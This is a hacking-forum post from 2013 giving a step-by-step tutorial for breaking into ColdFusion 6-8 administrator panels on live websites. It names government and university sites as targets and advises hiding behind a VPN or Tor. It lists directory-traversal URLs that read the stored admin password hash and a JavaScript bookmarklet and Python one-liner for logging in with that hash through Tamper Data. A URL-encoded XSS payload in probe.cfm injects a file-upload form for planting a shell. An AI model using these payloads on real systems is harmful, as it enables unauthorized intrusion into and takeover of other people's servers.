ColdFusion Hacking Tutorial 02-21-2013, 04:14 AM
#1
Cold Fusion Hacking Tutorial
Introduction
"ColdFusion is the name of a commercial rapid web application development platform invented by Jeremy and JJ Allaire in 1995. (The programming language used with that platform is also commonly called ColdFusion, though is more accurately known as CFML.) ColdFusion was originally designed to make it easier to connect simple HTML pages to a database. By Version 2 (1996), it had become a full platform that included an IDE in addition to a "full" scripting language. As of 2010, versions of ColdFusion (purchased by Adobe Systems in 2005) include advanced features for enterprise integration and development of rich Internet applications." - Wikipedia
ColdFusion is also extremely secure. Because of this, a lot of government websites use it, and so do many universities. Finding vulnerable websites takes a lot of time and patience. The only vulnerable version are 6,7, and 8.
Requirements/Needed materials
You will need:
- A VPN or Tor
- A Javascript Script that will be given later on
- Tamper Data
- Patience
Finding Vulnerable websites
Finding vulnerable websites takes a while. The most simple way to find them is using a google dork: ext:cfm. cfm is the file extension used by ColdFusion. In this tutorial, I will be using www.site.com as our website.
Testing if the website is vulnerable
Firstly get on a VPN or Tor. Now this part is a bit tricky because their are 2 parts. The 1st part is adding this to the end of your website: /CFIDE/administrator/. So it will be www.site.com/CFIDE/administrator/. /CFIDE/administrator/ is the location of the admin panel, which is what we're exploiting. If all goes according to plan, you should come across an admin panel that also will say the version of ColdFusion it's using. If it's under 6 or above 8, find a different website. The 2nd part is, if the version was 6-8, add (after /CFIDE/administrator/) :
- Version 6: enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en
- Version 7: enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en?
- Version 8: enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00e?n
If something like:
Code:
#Sat Feb 02 09:38:26 CET 2008 rdspassword= password=D132F5908A92640541ED7E8F44679D6C0E644D9A encrypted=trueShows up, it means the website is vulnerable. Now copy whatever is after password= until encrypter.
Exploiting the vulnerability
Now, add this script as a bookmark: javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value))
Then open Tamper Data. Go back to the website and paste the hashed password into the password bar, then click the javascript bookmark, then a window will pop up with another password, copy that. Go to tamper data and click start tampering. Go back to the website and click the login button. Tamper Data will alert you whether you want to tamper the data or cancel. Click the checkbox that says "Keep tampering" so that it stops tampering. Then click tamper. In the top right corner there will be a textbox that displays the hashed password. Replace that with the password that popped up in the box, and click ok. You should then, if done correctly, be in the CF panel.
Extra things
"There's also another method for example if failed to upload your shell it could be that /CFIDE is not writeable. But then it might be possible to subvert the outgoing firewall by exploiting a localhost XSS in probe.cfm
To do to this add this to your URL:
Code:
www.site.com/CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined(%22Form.File%22)%3E%3Ccftry%3E%3Ccffile%20action%3D%22upload%22%20destination%3D%22%23Expandpath(%22.%22)%23%22%20filefield%3D%22Form.File%22%20nameconflict%3D%22overwrite%22%3EFile%20uploaded!%3Ccfcatch%3EUpload%20failed%3C%2Fcfcatch%3E%3C%2Fcftry%3E%3C%2Fcfif%3E%3Cform%20method%3DPOST%20enctype%3D%22multipart%2Fform-data%22%3E%3Cinput%20type%3Dfile%20name%3D%22File%22%3E%3Cinput%20type%3Dsubmit%20value%3D%22Upload%22%3E%3C%2Fform%3E%3Cscript%3EIt exploits a zero day XSS attack in probe.cfm
Also if the j
Code:
jalert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value))Here it is:
Code:
python -c 'import hashlib,hmac; hash=raw_input("Hash > "); salt=raw_input("Salt > "); print "HMAC",hmac.new(salt,hash,hashlib.sha1).hexdigest().upper()'To see the hash view the source and CTRL+F 'salt' and paste it in there, you should get the password in HMAC form and as Cyber said, do that with Tamper Data." - INST1NCT
I hope you enjoyed the tutorial!Brought to you by The Goons
Wavy baby
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
![[Image: JJR.jpg]](https://dl.dropboxusercontent.com/u/18819048/JJR.jpg)
![[Image: fSEZXPs.png]](https://i.imgur.com/fSEZXPs.png)
![[Image: bAMEI93.jpg]](http://i.imgur.com/bAMEI93.jpg)
![[Image: F4Z9Dqw.png]](https://i.imgur.com/F4Z9Dqw.png)
